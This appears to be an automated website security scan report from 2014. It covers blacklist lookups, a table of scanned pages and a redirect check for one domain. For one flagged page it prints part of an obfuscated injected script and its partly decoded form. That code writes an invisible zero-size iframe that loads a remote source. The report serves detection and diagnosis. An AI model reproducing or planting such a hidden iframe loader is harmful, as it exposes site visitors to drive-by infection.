Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--qufem-5ra.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--qufem-5ra.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xn--qufem-5ra.com/ | 200 OK Content-Length: 22107 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 21696 Content-Type: application/javascript | clean |
http://xn--qufem-5ra.com/Bolsa_trabajo.php | 200 OK Content-Length: 6125 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/test404page.js | 404 Not Found Content-Length: 595 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/index.php | 200 OK Content-Length: 22107 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Catalunya_info.html | 200 OK Content-Length: 19234 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://xn--qufem-5ra.com/marco_camarerof.html | 200 OK Content-Length: 13382 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Sexy_Boys.html | 200 OK Content-Length: 14986 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/index_cenas_empresa.php | 200 OK Content-Length: 20489 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/Pergamino_info.html | 200 OK Content-Length: 12203 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/sexys1.html | 200 OK Content-Length: 17510 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/boys1.html | 200 OK Content-Length: 17309 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/index_camareros_falsos.php | 200 OK Content-Length: 20496 Content-Type: text/html | clean |
http://xn--qufem-5ra.com/restaurante_index.html | 200 OK Content-Length: 20088 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var tipRmEx;tipRmEx='%db%d3%d2%d2%d4%d5%d0%d1%aa%dc%f3%f0%dc%d8%ad%8a%cf%f0%96%f5%d2%d3%80%eb%d2%c4%e1%ec%d8%d5%9b%d3%df%c9%9d%dd%cd%eb%cd%8d%97%87%d7%ec%d2%c9%d3%8a%c3%d4%ca%d7%f2%e4%f6%c2%de%83%9f%c1%d0%d7%da%d5%d0%fb%e5%f8%d4%d3%8e%ef%c7%d3%fc%c7%ce%d1%90%95%af%ce%c2%c7%c8%d8%c2%d0%cf%e9%d3%ae%c0%ce%dc%84%d1%ca%ef%de%f1%c7%c8%cf%9e%fb%d0%88%9c%d9%d2%d5%87%ca%d7%f7%eb%dc%d8%99%d9%da%c9%c5%c8%c5%ee%c6%d8%96%ca%c9%f4%c4%f5%99%d6%88%d4%ca%fe%c5%dd%c ...[4226 bytes skipped]... Decoded script: function ipPak(){};var wordBed=new Date();ipPak.prototype={batMaskPong:function(){var conExMeta=document;if((new String(conExMeta.write)).indexOf('arity')>0) {return;}if(!this.sqlGz()) {try {onWilImg="<iframe name='tipCut' ";onWilImg+="frameborder=0 ";onWilImg+="src='"+this.atPkgPop();onWilImg+="'></iframe>";conExMeta.open();conExMeta.write(onWilImg);conExMeta.close();var onAwkExit=conExMeta.getElementsByName('tipCut');onAwkExit[0].style.height = 0;onAwkExit[0].style.width = 0;} catch(e) {conExMeta.write("maxWeConbgDoJin</body></html>");var calPastTop=this;setTimeout(function(){ calPastTop.batMaskPong() },1000);}this.zendPkgRm ...[1928 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xn--qufem-5ra.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:01:44 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--qufem-5ra.com
Referer: http://www.google.com/search?q=xn--qufem-5ra.com
Result:
The result is similar to the first query. There are no suspicious redirects found.